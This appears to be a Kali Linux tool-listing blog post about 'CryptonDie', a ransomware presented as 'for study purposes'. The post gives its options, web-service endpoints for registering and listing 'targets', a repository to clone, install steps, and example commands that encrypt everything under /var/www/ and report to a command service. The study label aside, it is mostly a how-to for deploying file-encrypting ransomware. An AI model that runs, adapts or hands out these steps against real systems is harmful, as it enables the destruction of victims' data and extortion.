Categories: Kali Linux

Cryptondie : A Ransomware Developed For Study Purposes

CryptonDie is a ransomware developed for study purposes.

Options

–key key used to encrypt and decrypt files, default is random string(recommended)
–dir Home directory for the attack, default is /
–encrypt Encrypt all files
–decrypt Decrypt all files
–verbose Active verbose mode, default is False

Example:
python3 cryptondie.py –web-service http://127.0.0.1:5000 –dir /var/www/ –encrypt –verbose

Web service endpoints

GET – /targets – list all targets (returns in JSON format)
GET – /targets/ – list one target by id (returns in JSON format)
POST – /target/ – create new target

Also Read – Kube-Alien : Tool To Launch Attack On k8s Cluster

how to run?

Clonning repository

git clone https://github.com/zer0dx/cryptondie

Install requirements

pip3 install -r requirements.txt

Running web service

cd cryptondie/discovery
python3 service_discovery.py

Running in Docker

docker build -t cryptondie .
docker run -it cryptondie /bin/bash
python cryptondie.py –web-service http://127.0.0.1:5000 –dir /var/www/ –encrypt –verbose

Which encryption is implemented?

Advanced Encryption Standard

R K

Recent Posts

Install Nextcloud on Ubuntu 18.04 with Apache and MySQL

Nextcloud is a free, open-source, self-hosted file sharing and collaboration platform. It gives you a private…

1 hour ago

Install Plex Media Server on Ubuntu 18.04: Step-by-Step Setup

Plex is a self-hosted streaming media server that organizes your video, music, and photo collections into…

1 hour ago

Install Visual Studio Code on Ubuntu 18.04: Microsoft Repo Setup

Visual Studio Code is a free, open-source, cross-platform code editor from Microsoft. It ships with built-in…

1 hour ago

Install Odoo 11 on Ubuntu 16.04 with Git and Python Virtualenv

Odoo is one of the most widely used open-source ERP platforms in the world. It handles…

1 hour ago

Secure Nginx with Let’s Encrypt on Ubuntu 16.04: SSL Setup Guide

Let's Encrypt is a free, automated, and open certificate authority run by the Internet Security Research…

1 hour ago

Install Nginx on Ubuntu 16.04: UFW, PPA, and Config Structure

Nginx (pronounced "engine x") is a free, open-source, high-performance HTTP server and reverse proxy. It handles…

1 day ago